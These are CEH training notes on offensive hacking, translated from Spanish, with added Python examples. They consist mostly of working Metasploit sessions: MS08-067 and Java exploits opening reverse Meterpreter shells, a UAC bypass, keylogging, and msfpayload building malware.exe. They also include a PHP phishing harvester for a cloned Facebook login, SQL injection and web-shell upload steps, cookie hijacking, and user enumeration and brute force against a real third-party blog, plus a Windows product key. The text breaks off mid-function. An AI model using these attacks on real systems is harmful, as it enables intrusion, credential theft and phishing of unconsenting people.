5/25/2018 CEH Notes (Apuntes CEH)
CEH NOTES
THERE IS NO CULTURE OF CAUTION BEFORE CLICKING!!!
Detailed Google searching (Google dorks)
allinurl:php?id= -> pages that take a numeric id parameter (SQL injection candidates)
allinurl:unillanos.edu.co filetype:pdf
site:unillanos.edu.co -> also returns the subdomains
allintitle:"index of" -> open directory listings
allinurl:/wp-admin/ -> WordPress admin paths
Look up the FOCA tool: it extracts the metadata from the documents it finds.
VULNERABILITY ANALYSIS
Go to secpoint.com -> freetools
Download the Google Hack DB tool and run it against the target:
unzip google-hack-db-tool-1.5.zip
cd googleDB\ tool\ 1.5/
ls
ls db/
python googleDB-tool.py -s mkit.com.ar -o mkit.html db/vulnerabilities.txt
less mkit.html
geany mkit.html
GATHERING INFO OVER TELNET (HTTP BANNER GRABBING)
root@bt:~/Downloads/googleDB tool 1.5# telnet www.google.com 80
Trying 173.194.37.146...
Connected to www.google.com.
Escape character is '^]'.
GET HTTP 1.1 /
HTTP/1.0 400 Bad Request
Content-Type: text/html; charset=UTF-8
Content-Length: 1419
Date: Mon, 05 May 2014 20:43:58 GMT
Server: GFE/2.0
Note: the request line typed above is malformed (the correct form is "GET / HTTP/1.1", followed by a "Host:" header and an empty line), which is why Google answers 400 Bad Request. The error response still reveals the server banner (GFE/2.0), which is all this exercise needs.
root@bt:~/Downloads/googleDB tool 1.5# telnet www.unillanos.edu.co 80
Trying 190.0.246.67...
Connected to unillanos.edu.co.
Escape character is '^]'.
get http 1.1 /
HTTP/1.1 408 Request Time-out
Date: Mon, 05 May 2014 20:47:05 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1
408 Request Time-out
Request Time-out
Server timeout waiting for the HTTP request from the client.
Apache/2.2.22 (Ubuntu) Server at www.unillanos.edu.co Port 80
Connection closed by foreign host.
Here Apache gave up waiting for a complete request (408), yet both the Server header and the error page footer disclose the exact version and distribution: Apache/2.2.22 on Ubuntu.
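The same exercise in code, as an added example that is not part of the original notes: it builds the request line the telnet sessions above got wrong ("GET / HTTP/1.1" plus a Host header) and pulls the fingerprinting headers out of whatever the server answers, error page included. The two sample responses are constructed here from the captures above; grab_banner() is the live variant and is not run offline.

```python
import socket

# Constructed sample responses, modelled on the two captured in the notes above.
# Even an error response carries the Server header, which is the point of banner grabbing.
SAMPLE_GOOGLE_400 = (
    b"HTTP/1.0 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Content-Length: 1419\r\n"
    b"Date: Mon, 05 May 2014 20:43:58 GMT\r\n"
    b"Server: GFE/2.0\r\n"
    b"\r\n"
    b"<html>...</html>"
)

SAMPLE_APACHE_408 = (
    b"HTTP/1.1 408 Request Time-out\r\n"
    b"Date: Mon, 05 May 2014 20:47:05 GMT\r\n"
    b"Server: Apache/2.2.22 (Ubuntu)\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
)


def build_request(host: str, path: str = "/") -> bytes:
    """Well-formed HTTP/1.1 request: METHOD SP PATH SP VERSION ('GET / HTTP/1.1'),
    not 'GET HTTP 1.1 /' as typed in the telnet session. HTTP/1.1 also requires
    a Host header, and the empty line terminates the request."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_banner(raw: bytes) -> dict:
    """Return the status code plus the headers that fingerprint the server."""
    raw = raw.replace(b"\r\n", b"\n")          # tolerate LF-only responses
    head, _, _body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").split("\n")
    version, status, *_ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split on the first colon only (Date: has more)
        headers[name.strip().lower()] = value.strip()
    return {
        "version": version,
        "status": int(status),
        "server": headers.get("server"),
        "powered_by": headers.get("x-powered-by"),
    }


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Live version of the telnet exercise (network access; not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        chunks = []
        while len(b"".join(chunks)) < 65536:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_banner(b"".join(chunks))


if __name__ == "__main__":
    for raw in (SAMPLE_GOOGLE_400, SAMPLE_APACHE_408):
        print(parse_banner(raw))
```

Run stand-alone it prints the parsed status and Server value for both constructed responses; point grab_banner() at a host you are authorised to test to repeat the telnet exercise with a correct request.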
HOST DISCOVERY OVER AN IP RANGE (nmap -sn: ping scan only, no port scan; this is not the null scan, which is -sN)
root@bt:~/Downloads/googleDB tool 1.5# nmap -sn -vv 192.168.72.1-255
Starting Nmap 6.01 ( http://nmap.org ) at 2014-05-05 17:55 ART
Initiating Ping Scan at 17:55
Scanning 255 hosts [4 ports/host]
Ping Scan Timing: About 15.25% done; ETC: 17:58 (0:02:52 remaining)
TCP SYN (HALF-OPEN) SCAN OVER THE SAME RANGE (nmap -sS; needs root to send raw packets)
root@bt:~/Downloads/googleDB tool 1.5# nmap -sS -vv 192.168.72.1-255
ATTACK METHODOLOGY
1. Verify which hosts are active
2. Identify open ports
3. Identify OS and services
4. Analyze vulnerabilities
5. Build the attack map
6. Configure proxies?
7. Attack
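Steps 1 to 3 of the methodology produce nmap output, and step 5 needs it condensed into a map of live hosts and their exposed services. The following is an added example, not part of the notes: it parses nmap's grepable output (what "nmap -sS -sV -oG <file> <range>" writes) and reduces it to the attack surface. The scan text is constructed for the example, not a real result; the 192.168.72.x range is the one used in the scans above.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable output (-oG). Not a real scan result.
SAMPLE_GNMAP = """\
# Nmap 6.01 scan initiated Mon May  5 17:55:00 2014 as: nmap -sS -sV -oG - 192.168.72.1-255
Host: 192.168.72.1 ()\tStatus: Up
Host: 192.168.72.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.9p1 Debian 5ubuntu1/, 80/open/tcp//http//Apache httpd 2.2.22 ((Ubuntu))/\tIgnored State: closed (998)
Host: 192.168.72.20 (win2003.lab.local)\tStatus: Up
Host: 192.168.72.20 (win2003.lab.local)\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows 2003 microsoft-ds/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)
Host: 192.168.72.30 ()\tStatus: Down
# Nmap done at Mon May  5 17:58:40 2014 -- 255 IP addresses (2 hosts up) scanned in 220.31 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)")


def parse_grepable(text):
    """Map ip -> {hostname, status, ports}. Fields are tab separated; each port entry is
    port/state/protocol/owner/service/rpc info/version/ (trailing slash included)."""
    hosts = defaultdict(lambda: {"hostname": "", "status": None, "ports": []})
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # '#' comment lines
        fields = line.split("\t")
        ip, name = HOST_RE.match(fields[0]).groups()
        rec = hosts[ip]
        rec["hostname"] = name
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                rec["status"] = value
            elif key == "Ports":
                for entry in value.split(", "):
                    parts = entry.split("/")
                    rec["ports"].append({
                        "port": int(parts[0]),
                        "state": parts[1],
                        "proto": parts[2],
                        "service": parts[4],
                        "version": parts[6] if len(parts) > 6 else "",
                    })
    return dict(hosts)


def attack_surface(hosts):
    """Step 2 of the methodology: live hosts with their open ports only."""
    surface = {}
    for ip, rec in hosts.items():
        open_ports = [p for p in rec["ports"] if p["state"] == "open"]
        if rec["status"] == "Up" and open_ports:
            surface[ip] = open_ports
    return surface


def smb_candidates(hosts):
    """Hosts exposing 445/tcp: where the SMB checks later in these notes would be
    pointed. An open port means 'check it', not 'vulnerable'."""
    return sorted(ip for ip, ports in attack_surface(hosts).items()
                  if any(p["port"] == 445 for p in ports))


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_GNMAP)
    for ip, ports in attack_surface(parsed).items():
        print(ip, [(p["port"], p["service"], p["version"]) for p in ports])
    print("SMB candidates:", smb_candidates(parsed))
```

Feed it a real -oG file with open(...).read() in place of SAMPLE_GNMAP; the version column is only populated when the scan included -sV (step 3).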
EXPLOITS
WELL-KNOWN ONES
MS08-067
MS09-050
MS10-020: IIS MUST BE ACTIVE.
EXPLOITS WITH METASPLOIT (it is written in Ruby)
Enumeration weaknesses, for example in WordPress: an error message like "the user is incorrect" already saves me more than half the work, because it confirms which usernames exist before a single password is tried.
TO START
cd /opt/metasploit
EXAMPLE ATTACK AGAINST WORDPRESS
msf > show modules
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > show options
Module options (auxiliary/scanner/http/wordpress_login_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current
database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
ENUMERATE_USERNAMES true yes Enumerate usernames
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RANGE_END 10 no Last user id to enumerate
RANGE_START 1 no First user id to enumerate
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Validate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(wordpress_login_enum) > set RHOSTS www.mkit.com.ar
RHOSTS => www.mkit.com.ar
msf auxiliary(wordpress_login_enum) > set TARGETURI /blog/
TARGETURI => /blog/
msf auxiliary(wordpress_login_enum) > exploit
[-] /blog/ does not seeem to be Wordpress site
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Without VHOST the module sends the resolved IP in the Host header, so a name-based virtual host does not answer with the blog and the site is not recognised as WordPress. Setting VHOST to the site name fixes it:
msf auxiliary(wordpress_login_enum) > set VHOST www.mkit.com.ar
VHOST => www.mkit.com.ar
msf auxiliary(wordpress_login_enum) > exploit
[*] /blog/ - WordPress Version 3.6.1 detected
[*] /blog/ - WordPress User-Enumeration - Running User Enumeration
[+] /blog/ - Found user 'kacho' with id 1
[+] /blog/ - Found user 'chino' with id 2
[+] /blog/ - Found user 'mkit' with id 3
[+] /blog/ - Found user 'nutria' with id 4
[*] /blog/ - Usernames stored in:
/root/.msf4/loot/20140505194954_default_74.63.249.67_wordpress.users_146048.txt
[*] /blog/ - WordPress User-Validation - Running User Validation
[*] /blog/ - WordPress User-Validation - Checking Username:''
[-] /blog/ - WordPress User-Validation - Invalid Username: ''
[*] /blog/ - WordPress Brute Force - Running Bruteforce
[*] /blog/ - Brute-forcing previously found accounts...
[*] /blog/ - WordPress Brute Force - Trying username:'kacho' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'kacho'
[*] /blog/ - WordPress Brute Force - Trying username:'chino' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'chino'
[*] /blog/ - WordPress Brute Force - Trying username:'mkit' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'mkit'
[*] /blog/ - WordPress Brute Force - Trying username:'nutria' with password:''
[-] /blog/ - WordPress Brute Force - Failed to login as 'nutria'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_login_enum) > back
msf > clear
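What the module did in the session above, written out as an added example (not code from the notes or from Metasploit): author-ID enumeration over /?author=N, which WordPress answers with a redirect to /author/<slug>/ and so leaks the login name, followed by username validation from the wp-login.php error text, which in WordPress 3.x differs for "no such user" and "wrong password". The target wp.example.test, its three users and every response below are constructed for the example; a real fetch must send the Host header (the VHOST lesson above).

```python
import re

AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")
INVALID_USER_RE = re.compile(r"Invalid username")
BAD_PASSWORD_RE = re.compile(r"The password you entered for the username .*? is incorrect")

BASE = "http://wp.example.test/blog/"   # hypothetical target, not a real site

# Constructed responses modelled on WordPress 3.x behaviour: (status, headers, body).
FAKE_SITE = {
    BASE + "?author=1": (301, {"Location": BASE + "author/admin/"}, ""),
    BASE + "?author=2": (301, {"Location": BASE + "author/alice/"}, ""),
    BASE + "?author=3": (301, {"Location": BASE + "author/editor/"}, ""),
    # ids 4..10 do not exist: WordPress answers 404 without a redirect
}
LOST = '<a href="/blog/wp-login.php?action=lostpassword">Lost your password</a>?'
LOGIN_BAD_USER = (200, {}, '<div id="login_error"><strong>ERROR</strong>: Invalid username. ' + LOST + '</div>')
BAD_PASS_TMPL = ('<div id="login_error"><strong>ERROR</strong>: The password you entered for the '
                 'username <strong>{user}</strong> is incorrect. ' + LOST + '</div>')
LOGIN_OK = (302, {"Location": BASE + "wp-admin/",
                  "Set-Cookie": "wordpress_logged_in_a1b2=alice%7C1399400000%7Cdeadbeef; path=/blog/; httponly"}, "")


def fake_fetch(url):
    """Stand-in for an HTTP GET that returns (status, headers, body)."""
    return FAKE_SITE.get(url, (404, {}, "<h1>Not Found</h1>"))


def fake_login(username, password="wrong-guess"):
    """Stand-in for POSTing log=<username>&pwd=<password> to wp-login.php."""
    if username in ("admin", "alice", "editor"):
        return (200, {}, BAD_PASS_TMPL.format(user=username))
    return LOGIN_BAD_USER


def enumerate_authors(fetch, base, start=1, end=10):
    """Author-ID enumeration (the module's RANGE_START..RANGE_END): /?author=N redirects
    to /author/<slug>/ when user N exists, and the slug defaults to the login name."""
    found = {}
    for uid in range(start, end + 1):
        status, headers, _body = fetch(f"{base}?author={uid}")
        if status in (301, 302):
            m = AUTHOR_RE.search(headers.get("Location", ""))
            if m:
                found[uid] = m.group(1)
    return found


def classify_login(status, headers, body):
    """Username validation from the wp-login.php answer: the message leak noted above."""
    if status == 302 and headers.get("Set-Cookie", "").startswith("wordpress_logged_in_"):
        return "success"
    if INVALID_USER_RE.search(body):
        return "no-such-user"
    if BAD_PASSWORD_RE.search(body):
        return "user-exists"
    return "unknown"


def validated_users(authors, login):
    """Keep only the enumerated names the login form confirms exist (VALIDATE_USERS)."""
    return sorted(name for name in set(authors.values())
                  if classify_login(*login(name)) in ("user-exists", "success"))


if __name__ == "__main__":
    authors = enumerate_authors(fake_fetch, BASE)
    print("author ids:", authors)
    print("confirmed users:", validated_users(authors, fake_login))
```

Both leaks are what a hardening review would look for on a WordPress install: a generic login error for every failure, and no redirect on /?author=N (or at least an author slug that differs from the login name).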
ANOTHER ATTACK:
msf > search ms08
(search output, truncated) ...soft Internet Explorer Data Binding Memory Corruption
exploit/windows/smb/ms08_067_netapi
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.237.2
RHOST => 192.168.237.2
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.2 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
(listing truncated) ...(Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
msf exploit(ms08_067_netapi) > set payload windows/patchupmeterpreter/bind_ipv6_tcp
payload => windows/patchupmeterpreter/bind_ipv6_tcp
set LHOST 192.168.237.1 (attacking machine)
set LPORT 1234
exploit
Note: a bind payload listens on the target (RHOST:LPORT) and the attacker connects to it, so LHOST plays no role there; LHOST belongs to reverse payloads, where the target connects back to the attacker's listener. The corrected workshop below uses windows/meterpreter/reverse_tcp, where LHOST matters.
CORRECTED METERPRETER WORKSHOP
root@bt:~# msfconsole
=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]
+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.237.129
RHOST => 192.168.237.129
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(ms08_067_netapi) > set LPORT 1234
LPORT => 1234
msf exploit(ms08_067_netapi) > show aoptions
[-] Invalid parameter "aoptions", use "show -h" for more information
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.237.128 yes The listen address
LPORT 1234 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.237.128:1234
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.237.129
[*] Meterpreter session 1 opened (192.168.237.128:1234 -> 192.168.237.129:1027) at 2014-05-06 12:47:59 -0300
meterpreter > getpid
Current pid: 828
meterpreter >
TUESDAY WORKSHOP
XP serial: RHKG3 8YW4W 4RHJG 83M4Y 7X9GW
Install Windows 7.
Go to http://pastebin.com/4ZZdFLuU and download:
w32-exec-calc-shellcode.bin
jre-7u7-windows-i586-iftw.exe
ALLMediaServer.exe
METERPRETER ON WINDOWS 7 WITH JAVA 7
root@bt:~# msfconsole
=[ metasploit v4.9.2-dev [core:4.9 api:1.0] ]
+ -- --=[ 1295 exploits - 695 auxiliary - 207 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
msf > use exploit/multi/browser/java_jre17_jaxws
msf exploit(java_jre17_jaxws) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_jre17_jaxws) > set URIPATH /soyunarchivolindo.php
URIPATH => /soyunarchivolindo.php
msf exploit(java_jre17_jaxws) > set target 1
target => 1
msf exploit(java_jre17_jaxws) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_jre17_jaxws) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(java_jre17_jaxws) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.237.128:4444
[*] Using URL: http://0.0.0.0:80/soyunarchivolindo.php
[*] Local IP: http://192.168.237.128:80/soyunarchivolindo.php
[*] Server started.
HERE, ON THE VICTIM, OPEN IE AND BROWSE TO THE PHP URL: http://192.168.237.128:80/soyunarchivolindo.php
msf exploit(java_jre17_jaxws) > [*] 192.168.237.132 java_jre17_jaxws - Java Applet JAX-WS
Remote Code Execution handling request
[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar
[*] 192.168.237.132 java_jre17_jaxws - Sending Applet.jar
[*] Sending stage (769536 bytes) to 192.168.237.132
[*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49224) at 2014-05-06 13:33:44 -0300
msf exploit(java_jre17_jaxws) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=192.168.237.128 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 192.168.237.128:4546 with UACBypass in effect...
[*] C:\Users\felcor\AppData\Local\Temp\QHayEz.exe /c %TEMP%\siwDGh.exe
meterpreter > [*] Meterpreter session 2 opened (192.168.237.128:4546 -> 192.168.237.132:49225) at 2014-05-06 13:36:01 -0300
meterpreter > sessions -i 2
[-] Unknown command: sessions.
(sessions is an msfconsole command, not a Meterpreter one; the same error came back for "sessions -i", "sessions -i 2" and "sessions -i -2". To switch sessions, first return to the msf prompt with "background", or exit the current session as done here.)
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.237.132 - Meterpreter session 1 closed. Reason: User exit
msf exploit(java_jre17_jaxws) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 PC\felcor @ PC 192.168.237.128:4546 -> 192.168.237.132:49225
(192.168.237.132)
msf exploit(java_jre17_jaxws) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 3800 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\System32>
ALLMEDIASERVER EXPLOIT
msf > search allmediaserver
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
msf > use exploit/windows/misc/allmediaserver_bof
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 888 yes The target port
Exploit target:
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > set RHOST 192.168.237.132
RHOST => 192.168.237.132
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.132 yes The target address
RPORT 888 yes The target port
Exploit target:
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(allmediaserver_bof) > set LHOST 192.168.237.128
LHOST => 192.168.237.128
msf exploit(allmediaserver_bof) > show options
Module options (exploit/windows/misc/allmediaserver_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.237.132 yes The target address
RPORT 888 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.237.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 ALLMediaServer 0.8 / Windows 7 SP1 - English
msf exploit(allmediaserver_bof) > exploit
[*] Started reverse handler on 192.168.237.128:4444
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (769536 bytes) to 192.168.237.132
[*] Meterpreter session 1 opened (192.168.237.128:4444 -> 192.168.237.132:49166) at 2014-05-06 13:53:33 -0300
meterpreter > shell
Process 2688 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\ALLMediaServer>
_________________________________________
FROM METERPRETER I CAN RUN:
keyscan_start
keyscan_dump
keyscan_stop
screenshot
Example:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
usuariofe
felipe 12345123
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter > screenshot
Screenshot saved to: /root/zKlrQWxJ.jpeg
meterpreter >
_________________________________________
ALTERNATIVE TO RUNNING AN EXPLOIT IN MSFCONSOLE (STANDALONE PAYLOAD):
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.237.128 LPORT=1234 X > malware.exe
(X tells msfpayload to emit a Windows executable. LHOST is the attacker's address, 192.168.237.128 in this lab, not the victim's. Before the victim runs malware.exe, start a listener with exploit/multi/handler using the same payload, LHOST and LPORT.)
PHISHING
COPY Facebook's login page (login.php)
Change the form's action to auth.php (it must point at the harvester file you actually create; here that file is out.php)
CREATE THE ACTION FILE
root@bt:~# cat /var/www/out.php
<?php
// Append the submitted credentials to a text file (this is the phishing harvester)
$myfile = fopen("passwords.txt","a+");
fwrite($myfile,$_POST['email']." : ".$_POST['pass']."\n");
fclose($myfile);
?>
Masking the URL so it looks like Facebook:
www.facebook.comAAAAAAAAwww.otro.com
____________________________________
WEB SECURITY
Two types:
1. SQL INJECTION
2. Cross-Site Scripting (XSS)
SEE THE SQL INJECTION IMAGE!!!
Tools: sqlmap, sqlninja. There are scanners for each CMS. In BackTrack: pentest -> cms...
SQL payload for searches, so that they return several records:
' OR '1'='1
Check MySQL's INTO OUTFILE (writing query results to a file on the server).
Write a PHP shell and try to upload it; there are more advanced ones.
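The ' OR '1'='1 payload above, worked through on a real database engine as an added example (not code from the notes). The vulnerable function builds the query by string concatenation, the safe one binds parameters; the in-memory SQLite table and its three accounts are constructed for the example. It also shows why the payload's position matters (in the password field it bypasses the login, in the username field it does not) and the comment variant admin'-- that logs in as one chosen user.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed test accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "S3cret!"), ("alice", "alice2014"), ("guest", "guest")])
    return con


def login_vulnerable(con, username, password):
    """Query assembled by concatenation: the input is parsed as SQL syntax.
    password = "' OR '1'='1" yields
      ... WHERE username = 'admin' AND password = '' OR '1'='1'
    and because AND binds tighter than OR, every row matches."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    """Same query with bound parameters: the input stays data, never syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def search_vulnerable(con, name):
    """The 'search that returns several records' case from the notes."""
    sql = "SELECT username FROM users WHERE username = '" + name + "'"
    return [row[0] for row in con.execute(sql)]


def search_safe(con, name):
    return [row[0] for row in con.execute(
        "SELECT username FROM users WHERE username = ?", (name,))]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, payload in password:", login_vulnerable(con, "admin", "' OR '1'='1"))
    print("vulnerable, payload in username:", login_vulnerable(con, "' OR '1'='1", "x"))
    print("vulnerable, comment variant:    ", login_vulnerable(con, "admin'-- ", "x"))
    print("safe, same payload:             ", login_safe(con, "admin", "' OR '1'='1"))
    print("search dump:                    ", search_vulnerable(con, "' OR '1'='1"))
```

The comment variant depends on the engine's comment syntax (-- in SQLite, MySQL and PostgreSQL; MySQL needs the space after it), which is one reason sqlmap fingerprints the backend first.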
The browser has cookie-management extensions: Cookie Editor!
Tool: the Greasemonkey add-on for Firefox, plus the cookie injector script, into which I paste the cookie dump captured with Wireshark.
Look up session hijacking against mkit argentina: www.mkit.com.ar/blog.
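The middle step of that procedure, as an added example that is not part of the notes: given the text of a captured HTTP stream (what Wireshark's "Follow TCP Stream" shows), pull out the Cookie headers, keep only the cookies that carry a session, and format the line to paste into the injector. It also reads the Set-Cookie flags from the server's response, because whether the cookie was marked Secure is what decides if this replay is possible at all. The stream, host and cookie values are constructed for the example.

```python
import re

# Constructed HTTP stream in the form Wireshark's "Follow TCP Stream" shows; not a real capture.
SAMPLE_STREAM = "\r\n".join([
    "POST /blog/wp-login.php HTTP/1.1",
    "Host: wp.example.test",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 40",
    "",
    "log=alice&pwd=guess1234&wp-submit=Log+In",
    "HTTP/1.1 302 Found",
    "Server: Apache/2.2.22 (Ubuntu)",
    "Set-Cookie: wordpress_logged_in_a1b2=alice%7C1399400000%7Cdeadbeef; path=/blog/; httponly",
    "Set-Cookie: PHPSESSID=3f9a1c2b7e; path=/",
    "Location: http://wp.example.test/blog/wp-admin/",
    "",
    "GET /blog/wp-admin/ HTTP/1.1",
    "Host: wp.example.test",
    "Cookie: PHPSESSID=3f9a1c2b7e; wordpress_logged_in_a1b2=alice%7C1399400000%7Cdeadbeef; wp-settings-time-1=1399400001",
    "",
])

COOKIE_HDR_RE = re.compile(r"^Cookie: (.*)$", re.MULTILINE)
SET_COOKIE_RE = re.compile(r"^Set-Cookie: (.*)$", re.MULTILINE)
# Names that usually carry the session: PHP, Java, ASP.NET, Django/Rails-style, WordPress auth.
SESSION_NAME_RE = re.compile(
    r"^(PHPSESSID|JSESSIONID|ASP\.NET_SessionId|sessionid|_session_id|sid|"
    r"wordpress_logged_in_.*|wordpress_sec_.*)$", re.IGNORECASE)


def extract_cookies(stream):
    """All name=value pairs the client sent in Cookie: headers (last value wins)."""
    cookies = {}
    for header in COOKIE_HDR_RE.findall(stream):
        for pair in header.strip().split(";"):       # .strip() drops the trailing \r
            name, _, value = pair.strip().partition("=")
            if name:
                cookies[name] = value
    return cookies


def set_cookie_flags(stream):
    """Secure/HttpOnly attributes per cookie the server set. No Secure flag over
    plain HTTP is exactly why the sniffed cookie can be replayed."""
    flags = {}
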